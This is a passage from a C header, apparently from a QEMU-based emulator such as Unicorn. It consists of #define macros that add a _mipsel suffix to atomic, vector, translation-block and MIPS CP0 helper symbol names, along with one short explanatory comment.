helper_atomic_umin_fetchq_le_mmu_mipsel #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_mipsel #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_mipsel #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_mipsel #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_mipsel #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_mipsel #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_mipsel #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_mipsel #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_mipsel #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_mipsel #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_mipsel #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_mipsel #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_mipsel #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_mipsel #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_mipsel #define 
helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_mipsel #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_mipsel #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_mipsel #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_mipsel #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_mipsel #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_mipsel #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_mipsel #define helper_atomic_xchgb helper_atomic_xchgb_mipsel #define helper_atomic_fetch_addb helper_atomic_fetch_addb_mipsel #define helper_atomic_fetch_andb helper_atomic_fetch_andb_mipsel #define helper_atomic_fetch_orb helper_atomic_fetch_orb_mipsel #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_mipsel #define helper_atomic_add_fetchb helper_atomic_add_fetchb_mipsel #define helper_atomic_and_fetchb helper_atomic_and_fetchb_mipsel #define helper_atomic_or_fetchb helper_atomic_or_fetchb_mipsel #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_mipsel #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_mipsel #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_mipsel #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_mipsel #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_mipsel #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_mipsel #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_mipsel #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_mipsel #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_mipsel #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_mipsel #define helper_atomic_xchgw_le helper_atomic_xchgw_le_mipsel #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_mipsel #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_mipsel #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_mipsel #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_mipsel #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_mipsel #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_mipsel #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_mipsel #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_mipsel #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_mipsel #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_mipsel #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_mipsel #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_mipsel #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_mipsel #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_mipsel #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_mipsel #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_mipsel #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_mipsel #define helper_atomic_xchgw_be helper_atomic_xchgw_be_mipsel #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_mipsel #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_mipsel #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_mipsel #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_mipsel #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_mipsel #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_mipsel #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_mipsel #define 
helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_mipsel #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_mipsel #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_mipsel #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_mipsel #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_mipsel #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_mipsel #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_mipsel #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_mipsel #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_mipsel #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_mipsel #define helper_atomic_xchgl_le helper_atomic_xchgl_le_mipsel #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_mipsel #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_mipsel #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_mipsel #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_mipsel #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_mipsel #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_mipsel #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_mipsel #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_mipsel #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_mipsel #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_mipsel #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_mipsel #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_mipsel #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_mipsel #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_mipsel #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_mipsel #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_mipsel #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_mipsel #define helper_atomic_xchgl_be helper_atomic_xchgl_be_mipsel #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_mipsel #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_mipsel #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_mipsel #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_mipsel #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_mipsel #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_mipsel #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_mipsel #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_mipsel #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_mipsel #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_mipsel #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_mipsel #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_mipsel #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_mipsel #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_mipsel #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_mipsel #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_mipsel #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_mipsel #define helper_atomic_xchgq_le helper_atomic_xchgq_le_mipsel #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_mipsel #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_mipsel #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_mipsel #define 
helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_mipsel #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_mipsel #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_mipsel #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_mipsel #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_mipsel #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_mipsel #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_mipsel #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_mipsel #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_mipsel #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_mipsel #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_mipsel #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_mipsel #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_mipsel #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_mipsel #define helper_atomic_xchgq_be helper_atomic_xchgq_be_mipsel #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_mipsel #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_mipsel #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_mipsel #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_mipsel #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_mipsel #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_mipsel #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_mipsel #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_mipsel #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_mipsel #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_mipsel #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_mipsel #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_mipsel #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_mipsel #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_mipsel #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_mipsel #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_mipsel #define cpu_ldub_code cpu_ldub_code_mipsel #define cpu_lduw_code cpu_lduw_code_mipsel #define cpu_ldl_code cpu_ldl_code_mipsel #define cpu_ldq_code cpu_ldq_code_mipsel #define helper_div_i32 helper_div_i32_mipsel #define helper_rem_i32 helper_rem_i32_mipsel #define helper_divu_i32 helper_divu_i32_mipsel #define helper_remu_i32 helper_remu_i32_mipsel #define helper_shl_i64 helper_shl_i64_mipsel #define helper_shr_i64 helper_shr_i64_mipsel #define helper_sar_i64 helper_sar_i64_mipsel #define helper_div_i64 helper_div_i64_mipsel #define helper_rem_i64 helper_rem_i64_mipsel #define helper_divu_i64 helper_divu_i64_mipsel #define helper_remu_i64 helper_remu_i64_mipsel #define helper_muluh_i64 helper_muluh_i64_mipsel #define helper_mulsh_i64 helper_mulsh_i64_mipsel #define helper_clz_i32 helper_clz_i32_mipsel #define helper_ctz_i32 helper_ctz_i32_mipsel #define helper_clz_i64 helper_clz_i64_mipsel #define helper_ctz_i64 helper_ctz_i64_mipsel #define helper_clrsb_i32 helper_clrsb_i32_mipsel #define helper_clrsb_i64 helper_clrsb_i64_mipsel #define helper_ctpop_i32 helper_ctpop_i32_mipsel #define helper_ctpop_i64 helper_ctpop_i64_mipsel #define helper_lookup_tb_ptr helper_lookup_tb_ptr_mipsel #define helper_exit_atomic helper_exit_atomic_mipsel #define helper_gvec_add8 helper_gvec_add8_mipsel #define helper_gvec_add16 
helper_gvec_add16_mipsel #define helper_gvec_add32 helper_gvec_add32_mipsel #define helper_gvec_add64 helper_gvec_add64_mipsel #define helper_gvec_adds8 helper_gvec_adds8_mipsel #define helper_gvec_adds16 helper_gvec_adds16_mipsel #define helper_gvec_adds32 helper_gvec_adds32_mipsel #define helper_gvec_adds64 helper_gvec_adds64_mipsel #define helper_gvec_sub8 helper_gvec_sub8_mipsel #define helper_gvec_sub16 helper_gvec_sub16_mipsel #define helper_gvec_sub32 helper_gvec_sub32_mipsel #define helper_gvec_sub64 helper_gvec_sub64_mipsel #define helper_gvec_subs8 helper_gvec_subs8_mipsel #define helper_gvec_subs16 helper_gvec_subs16_mipsel #define helper_gvec_subs32 helper_gvec_subs32_mipsel #define helper_gvec_subs64 helper_gvec_subs64_mipsel #define helper_gvec_mul8 helper_gvec_mul8_mipsel #define helper_gvec_mul16 helper_gvec_mul16_mipsel #define helper_gvec_mul32 helper_gvec_mul32_mipsel #define helper_gvec_mul64 helper_gvec_mul64_mipsel #define helper_gvec_muls8 helper_gvec_muls8_mipsel #define helper_gvec_muls16 helper_gvec_muls16_mipsel #define helper_gvec_muls32 helper_gvec_muls32_mipsel #define helper_gvec_muls64 helper_gvec_muls64_mipsel #define helper_gvec_neg8 helper_gvec_neg8_mipsel #define helper_gvec_neg16 helper_gvec_neg16_mipsel #define helper_gvec_neg32 helper_gvec_neg32_mipsel #define helper_gvec_neg64 helper_gvec_neg64_mipsel #define helper_gvec_abs8 helper_gvec_abs8_mipsel #define helper_gvec_abs16 helper_gvec_abs16_mipsel #define helper_gvec_abs32 helper_gvec_abs32_mipsel #define helper_gvec_abs64 helper_gvec_abs64_mipsel #define helper_gvec_mov helper_gvec_mov_mipsel #define helper_gvec_dup64 helper_gvec_dup64_mipsel #define helper_gvec_dup32 helper_gvec_dup32_mipsel #define helper_gvec_dup16 helper_gvec_dup16_mipsel #define helper_gvec_dup8 helper_gvec_dup8_mipsel #define helper_gvec_not helper_gvec_not_mipsel #define helper_gvec_and helper_gvec_and_mipsel #define helper_gvec_or helper_gvec_or_mipsel #define helper_gvec_xor helper_gvec_xor_mipsel #define helper_gvec_andc helper_gvec_andc_mipsel #define helper_gvec_orc helper_gvec_orc_mipsel #define helper_gvec_nand helper_gvec_nand_mipsel #define helper_gvec_nor helper_gvec_nor_mipsel #define helper_gvec_eqv helper_gvec_eqv_mipsel #define helper_gvec_ands helper_gvec_ands_mipsel #define helper_gvec_xors helper_gvec_xors_mipsel #define helper_gvec_ors helper_gvec_ors_mipsel #define helper_gvec_shl8i helper_gvec_shl8i_mipsel #define helper_gvec_shl16i helper_gvec_shl16i_mipsel #define helper_gvec_shl32i helper_gvec_shl32i_mipsel #define helper_gvec_shl64i helper_gvec_shl64i_mipsel #define helper_gvec_shr8i helper_gvec_shr8i_mipsel #define helper_gvec_shr16i helper_gvec_shr16i_mipsel #define helper_gvec_shr32i helper_gvec_shr32i_mipsel #define helper_gvec_shr64i helper_gvec_shr64i_mipsel #define helper_gvec_sar8i helper_gvec_sar8i_mipsel #define helper_gvec_sar16i helper_gvec_sar16i_mipsel #define helper_gvec_sar32i helper_gvec_sar32i_mipsel #define helper_gvec_sar64i helper_gvec_sar64i_mipsel #define helper_gvec_shl8v helper_gvec_shl8v_mipsel #define helper_gvec_shl16v helper_gvec_shl16v_mipsel #define helper_gvec_shl32v helper_gvec_shl32v_mipsel #define helper_gvec_shl64v helper_gvec_shl64v_mipsel #define helper_gvec_shr8v helper_gvec_shr8v_mipsel #define helper_gvec_shr16v helper_gvec_shr16v_mipsel #define helper_gvec_shr32v helper_gvec_shr32v_mipsel #define helper_gvec_shr64v helper_gvec_shr64v_mipsel #define helper_gvec_sar8v helper_gvec_sar8v_mipsel #define helper_gvec_sar16v helper_gvec_sar16v_mipsel #define 
helper_gvec_sar32v helper_gvec_sar32v_mipsel #define helper_gvec_sar64v helper_gvec_sar64v_mipsel #define helper_gvec_eq8 helper_gvec_eq8_mipsel #define helper_gvec_ne8 helper_gvec_ne8_mipsel #define helper_gvec_lt8 helper_gvec_lt8_mipsel #define helper_gvec_le8 helper_gvec_le8_mipsel #define helper_gvec_ltu8 helper_gvec_ltu8_mipsel #define helper_gvec_leu8 helper_gvec_leu8_mipsel #define helper_gvec_eq16 helper_gvec_eq16_mipsel #define helper_gvec_ne16 helper_gvec_ne16_mipsel #define helper_gvec_lt16 helper_gvec_lt16_mipsel #define helper_gvec_le16 helper_gvec_le16_mipsel #define helper_gvec_ltu16 helper_gvec_ltu16_mipsel #define helper_gvec_leu16 helper_gvec_leu16_mipsel #define helper_gvec_eq32 helper_gvec_eq32_mipsel #define helper_gvec_ne32 helper_gvec_ne32_mipsel #define helper_gvec_lt32 helper_gvec_lt32_mipsel #define helper_gvec_le32 helper_gvec_le32_mipsel #define helper_gvec_ltu32 helper_gvec_ltu32_mipsel #define helper_gvec_leu32 helper_gvec_leu32_mipsel #define helper_gvec_eq64 helper_gvec_eq64_mipsel #define helper_gvec_ne64 helper_gvec_ne64_mipsel #define helper_gvec_lt64 helper_gvec_lt64_mipsel #define helper_gvec_le64 helper_gvec_le64_mipsel #define helper_gvec_ltu64 helper_gvec_ltu64_mipsel #define helper_gvec_leu64 helper_gvec_leu64_mipsel #define helper_gvec_ssadd8 helper_gvec_ssadd8_mipsel #define helper_gvec_ssadd16 helper_gvec_ssadd16_mipsel #define helper_gvec_ssadd32 helper_gvec_ssadd32_mipsel #define helper_gvec_ssadd64 helper_gvec_ssadd64_mipsel #define helper_gvec_sssub8 helper_gvec_sssub8_mipsel #define helper_gvec_sssub16 helper_gvec_sssub16_mipsel #define helper_gvec_sssub32 helper_gvec_sssub32_mipsel #define helper_gvec_sssub64 helper_gvec_sssub64_mipsel #define helper_gvec_usadd8 helper_gvec_usadd8_mipsel #define helper_gvec_usadd16 helper_gvec_usadd16_mipsel #define helper_gvec_usadd32 helper_gvec_usadd32_mipsel #define helper_gvec_usadd64 helper_gvec_usadd64_mipsel #define helper_gvec_ussub8 helper_gvec_ussub8_mipsel #define helper_gvec_ussub16 helper_gvec_ussub16_mipsel #define helper_gvec_ussub32 helper_gvec_ussub32_mipsel #define helper_gvec_ussub64 helper_gvec_ussub64_mipsel #define helper_gvec_smin8 helper_gvec_smin8_mipsel #define helper_gvec_smin16 helper_gvec_smin16_mipsel #define helper_gvec_smin32 helper_gvec_smin32_mipsel #define helper_gvec_smin64 helper_gvec_smin64_mipsel #define helper_gvec_smax8 helper_gvec_smax8_mipsel #define helper_gvec_smax16 helper_gvec_smax16_mipsel #define helper_gvec_smax32 helper_gvec_smax32_mipsel #define helper_gvec_smax64 helper_gvec_smax64_mipsel #define helper_gvec_umin8 helper_gvec_umin8_mipsel #define helper_gvec_umin16 helper_gvec_umin16_mipsel #define helper_gvec_umin32 helper_gvec_umin32_mipsel #define helper_gvec_umin64 helper_gvec_umin64_mipsel #define helper_gvec_umax8 helper_gvec_umax8_mipsel #define helper_gvec_umax16 helper_gvec_umax16_mipsel #define helper_gvec_umax32 helper_gvec_umax32_mipsel #define helper_gvec_umax64 helper_gvec_umax64_mipsel #define helper_gvec_bitsel helper_gvec_bitsel_mipsel #define cpu_restore_state cpu_restore_state_mipsel #define page_collection_lock page_collection_lock_mipsel #define page_collection_unlock page_collection_unlock_mipsel #define free_code_gen_buffer free_code_gen_buffer_mipsel #define tcg_exec_init tcg_exec_init_mipsel #define tb_cleanup tb_cleanup_mipsel #define tb_flush tb_flush_mipsel #define tb_phys_invalidate tb_phys_invalidate_mipsel #define tb_gen_code tb_gen_code_mipsel #define tb_exec_lock tb_exec_lock_mipsel #define tb_exec_unlock 
tb_exec_unlock_mipsel #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mipsel #define tb_invalidate_phys_range tb_invalidate_phys_range_mipsel #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mipsel #define tb_check_watchpoint tb_check_watchpoint_mipsel #define cpu_io_recompile cpu_io_recompile_mipsel #define tb_flush_jmp_cache tb_flush_jmp_cache_mipsel #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_mipsel #define translator_loop_temp_check translator_loop_temp_check_mipsel #define translator_loop translator_loop_mipsel #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_mipsel #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_mipsel #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_mipsel #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_mipsel #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_mipsel #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_mipsel #define unassigned_mem_ops unassigned_mem_ops_mipsel #define floatx80_infinity floatx80_infinity_mipsel #define dup_const_func dup_const_func_mipsel #define gen_helper_raise_exception gen_helper_raise_exception_mipsel #define gen_helper_raise_interrupt gen_helper_raise_interrupt_mipsel #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mipsel #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mipsel #define gen_helper_cpsr_read gen_helper_cpsr_read_mipsel #define gen_helper_cpsr_write gen_helper_cpsr_write_mipsel #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_mipsel #define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mipsel #define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mipsel #define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mipsel #define helper_mfc0_random helper_mfc0_random_mipsel #define helper_mfc0_tcstatus helper_mfc0_tcstatus_mipsel #define helper_mftc0_tcstatus helper_mftc0_tcstatus_mipsel #define helper_mfc0_tcbind helper_mfc0_tcbind_mipsel #define helper_mftc0_tcbind helper_mftc0_tcbind_mipsel #define helper_mfc0_tcrestart helper_mfc0_tcrestart_mipsel #define helper_mftc0_tcrestart helper_mftc0_tcrestart_mipsel #define helper_mfc0_tchalt helper_mfc0_tchalt_mipsel #define helper_mftc0_tchalt helper_mftc0_tchalt_mipsel #define helper_mfc0_tccontext helper_mfc0_tccontext_mipsel #define helper_mftc0_tccontext helper_mftc0_tccontext_mipsel #define helper_mfc0_tcschedule helper_mfc0_tcschedule_mipsel #define helper_mftc0_tcschedule helper_mftc0_tcschedule_mipsel #define helper_mfc0_tcschefback helper_mfc0_tcschefback_mipsel #define helper_mftc0_tcschefback helper_mftc0_tcschefback_mipsel #define helper_mfc0_count helper_mfc0_count_mipsel #define helper_mfc0_saar helper_mfc0_saar_mipsel #define helper_mfhc0_saar helper_mfhc0_saar_mipsel #define helper_mftc0_entryhi helper_mftc0_entryhi_mipsel #define helper_mftc0_cause helper_mftc0_cause_mipsel #define helper_mftc0_status helper_mftc0_status_mipsel #define helper_mfc0_lladdr helper_mfc0_lladdr_mipsel #define helper_mfc0_maar helper_mfc0_maar_mipsel #define helper_mfhc0_maar helper_mfhc0_maar_mipsel #define helper_mfc0_watchlo helper_mfc0_watchlo_mipsel #define helper_mfc0_watchhi helper_mfc0_watchhi_mipsel #define helper_mfhc0_watchhi helper_mfhc0_watchhi_mipsel #define helper_mfc0_debug helper_mfc0_debug_mipsel #define helper_mftc0_debug helper_mftc0_debug_mipsel #define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mipsel #define helper_dmfc0_tchalt helper_dmfc0_tchalt_mipsel #define helper_dmfc0_tccontext helper_dmfc0_tccontext_mipsel #define 
helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mipsel #define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mipsel #define helper_dmfc0_lladdr helper_dmfc0_lladdr_mipsel #define helper_dmfc0_maar helper_dmfc0_maar_mipsel #define helper_dmfc0_watchlo helper_dmfc0_watchlo_mipsel #define helper_dmfc0_watchhi helper_dmfc0_watchhi_mipsel #define helper_dmfc0_saar helper_dmfc0_saar_mipsel #define helper_mtc0_index helper_mtc0_index_mipsel #define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mipsel #define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mipsel #define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mipsel #define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mipsel #define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mipsel #define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mipsel #define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mipsel #define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mipsel #define helper_mtc0_yqmask helper_mtc0_yqmask_mipsel #define helper_mtc0_vpeopt helper_mtc0_vpeopt_mipsel #define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mipsel #define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mipsel #define helper_mtc0_tcstatus helper_mtc0_tcstatus_mipsel #define helper_mttc0_tcstatus helper_mttc0_tcstatus_mipsel #define helper_mtc0_tcbind helper_mtc0_tcbind_mipsel #define helper_mttc0_tcbind helper_mttc0_tcbind_mipsel #define helper_mtc0_tcrestart helper_mtc0_tcrestart_mipsel #define helper_mttc0_tcrestart helper_mttc0_tcrestart_mipsel #define helper_mtc0_tchalt helper_mtc0_tchalt_mipsel #define helper_mttc0_tchalt helper_mttc0_tchalt_mipsel #define helper_mtc0_tccontext helper_mtc0_tccontext_mipsel #define helper_mttc0_tccontext helper_mttc0_tccontext_mipsel #define helper_mtc0_tcschedule helper_mtc0_tcschedule_mipsel #define helper_mttc0_tcschedule helper_mttc0_tcschedule_mipsel #define helper_mtc0_tcschefback helper_mtc0_tcschefback_mipsel #define helper_mttc0_tcschefback helper_mttc0_tcschefback_mipsel #define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mipsel #define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mipsel #define helper_mtc0_context helper_mtc0_context_mipsel #define helper_mtc0_memorymapid helper_mtc0_memorymapid_mipsel #define update_pagemask update_pagemask_mipsel #define helper_mtc0_pagemask helper_mtc0_pagemask_mipsel #define helper_mtc0_pagegrain helper_mtc0_pagegrain_mipsel #define helper_mtc0_segctl0 helper_mtc0_segctl0_mipsel #define helper_mtc0_segctl1 helper_mtc0_segctl1_mipsel #define helper_mtc0_segctl2 helper_mtc0_segctl2_mipsel #define helper_mtc0_pwfield helper_mtc0_pwfield_mipsel #define helper_mtc0_pwsize helper_mtc0_pwsize_mipsel #define helper_mtc0_wired helper_mtc0_wired_mipsel #define helper_mtc0_pwctl helper_mtc0_pwctl_mipsel #define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mipsel #define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mipsel #define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mipsel #define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mipsel #define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mipsel #define helper_mtc0_hwrena helper_mtc0_hwrena_mipsel #define helper_mtc0_count helper_mtc0_count_mipsel #define helper_mtc0_saari helper_mtc0_saari_mipsel #define helper_mtc0_saar helper_mtc0_saar_mipsel #define helper_mthc0_saar helper_mthc0_saar_mipsel #define helper_mtc0_entryhi helper_mtc0_entryhi_mipsel #define helper_mttc0_entryhi helper_mttc0_entryhi_mipsel #define helper_mtc0_compare helper_mtc0_compare_mipsel #define helper_mtc0_status helper_mtc0_status_mipsel #define helper_mttc0_status helper_mttc0_status_mipsel 
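/*
 * Editor's note (illustrative, assuming QEMU's usual helper machinery):
 * the helper_mfc0_* / helper_mtc0_* entries above are the MIPS CP0
 * move-from/move-to coprocessor helpers. They are declared through
 * DEF_HELPER_* macros and invoked from the translator as
 * gen_helper_<name>(...), so renaming the helper_* symbol here keeps
 * the generated gen_helper_* call sites consistent as well, e.g.
 *
 *     gen_helper_mtc0_status(tcg_ctx, cpu_env, t0);
 *
 * resolves to helper_mtc0_status_mipsel at link time (exact argument
 * lists depend on the corresponding DEF_HELPER declaration).
 */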
#define helper_mtc0_intctl helper_mtc0_intctl_mipsel #define helper_mtc0_srsctl helper_mtc0_srsctl_mipsel #define helper_mtc0_cause helper_mtc0_cause_mipsel #define helper_mttc0_cause helper_mttc0_cause_mipsel #define helper_mftc0_epc helper_mftc0_epc_mipsel #define helper_mftc0_ebase helper_mftc0_ebase_mipsel #define helper_mtc0_ebase helper_mtc0_ebase_mipsel #define helper_mttc0_ebase helper_mttc0_ebase_mipsel #define helper_mftc0_configx helper_mftc0_configx_mipsel #define helper_mtc0_config0 helper_mtc0_config0_mipsel #define helper_mtc0_config2 helper_mtc0_config2_mipsel #define helper_mtc0_config3 helper_mtc0_config3_mipsel #define helper_mtc0_config4 helper_mtc0_config4_mipsel #define helper_mtc0_config5 helper_mtc0_config5_mipsel #define helper_mtc0_lladdr helper_mtc0_lladdr_mipsel #define helper_mtc0_maar helper_mtc0_maar_mipsel #define helper_mthc0_maar helper_mthc0_maar_mipsel #define helper_mtc0_maari helper_mtc0_maari_mipsel #define helper_mtc0_watchlo 